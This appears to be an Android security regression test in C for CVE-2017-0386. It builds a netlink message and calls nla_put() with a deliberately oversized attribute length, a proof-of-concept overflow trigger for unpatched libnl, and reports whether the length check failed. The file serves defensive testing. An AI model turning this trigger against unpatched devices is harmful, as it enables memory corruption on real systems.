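/**
 * Copyright (C) 2019 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
#define _GNU_SOURCE

#define LOG_TAG "CVE-2017-0386"

#include <sys/wait.h>
#include <sys/types.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <log/log.h>
#include <netlink/msg.h>
#include <netlink/netlink.h>
#include <netlink-private/object-api.h>
#include <netlink-private/types.h>
#include <netlink/object.h>
#include <netlink/attr.h>

#include "../includes/common.h"

/*
 * Regression test for CVE-2017-0386 (libnl attribute length handling).
 *
 * A netlink message is first filled with a page-sized attribute so that its
 * nlmsg_len is known.  A second attribute is then added with a deliberately
 * absurd length (0xFFFFF000) that no correct length check can accept.  A
 * patched libnl must reject that nla_put() and leave nlmsg_len untouched; if
 * nlmsg_len changed, the length check was bypassed and the message buffer was
 * most likely written past its end.
 *
 * Exit codes:
 *   EXIT_SUCCESS    - second attribute rejected, nlmsg_len unchanged
 *   EXIT_VULNERABLE - nlmsg_len changed (113, defined in ../includes/common.h)
 *   EXIT_FAILURE    - test infrastructure problem (allocation failed)
 */
int main(void) {
    struct nl_msg *message = NULL;
    struct nlmsghdr *hdr = NULL;
    char *data = NULL;
    uint32_t result = 0;
    int ret = EXIT_SUCCESS;
    int pagesize = getpagesize();
    /* Sizes are the original PoC's tuning values; they position the message
     * fill level before the oversized put and are intentionally unchanged. */
    size_t payloadlength = (size_t)pagesize + 12 - 0x30;
    size_t payload2length = (size_t)pagesize;

    message = nlmsg_alloc();
    if (message == NULL) {
        ALOGE("Alloc message memory failed");
        return EXIT_FAILURE;
    }

    ALOGI("nl_msg.nm_size : %zx\n", message->nm_size);
    hdr = message->nm_nlh;

    /* First attribute payload: fills the message to a known length. */
    data = malloc(payloadlength);
    if (data == NULL) {
        ALOGE("Alloc data memory failed");
        ret = EXIT_FAILURE;
        goto out;
    }

    memset(data, 0x41, payloadlength);
    nla_put(message, 0x4444, payloadlength, data);
    /* Snapshot of nlmsg_len taken before the oversized put; the verdict is
     * the comparison against this value. */
    result = hdr->nlmsg_len;
    ALOGI("message address [%p, %p]", hdr, nlmsg_tail(hdr));
    ALOGI("message len = 0x%x", result);

    free(data);
    data = NULL;

    /* Second attribute payload. */
    data = malloc(payload2length);
    if (data == NULL) {
        ALOGE("Alloc data2 memory failed");
        ret = EXIT_FAILURE;
        goto out;
    }
    memset(data, 0x33, payload2length);
    ALOGI("\n\n\nPutting down overflow.......\n\n\n");
    /* The declared attribute length vastly exceeds both the buffer and the
     * message; a correct nla_put() must fail here without modifying the
     * message.  Its return value is deliberately not checked: the verdict is
     * taken from nlmsg_len so that a libnl which reports success is still
     * caught. */
    nla_put(message, 0x8888, 0xFFFFF000, data);

    ALOGI("message address [%p, %p]", hdr, nlmsg_tail(hdr));
    ALOGI("message len = 0x%x", hdr->nlmsg_len);

    /*
     * return 113 error code if length is mismatch
     */
    if (result != hdr->nlmsg_len) {
        ret = EXIT_VULNERABLE;
    }

out:
    /* free(NULL) is a no-op and message is non-NULL on every path reaching
     * here, so no guards are needed.  (The previous `if (!data)` /
     * `if (!message)` guards were inverted and leaked both objects.) */
    free(data);
    nlmsg_free(message);
    return ret;
}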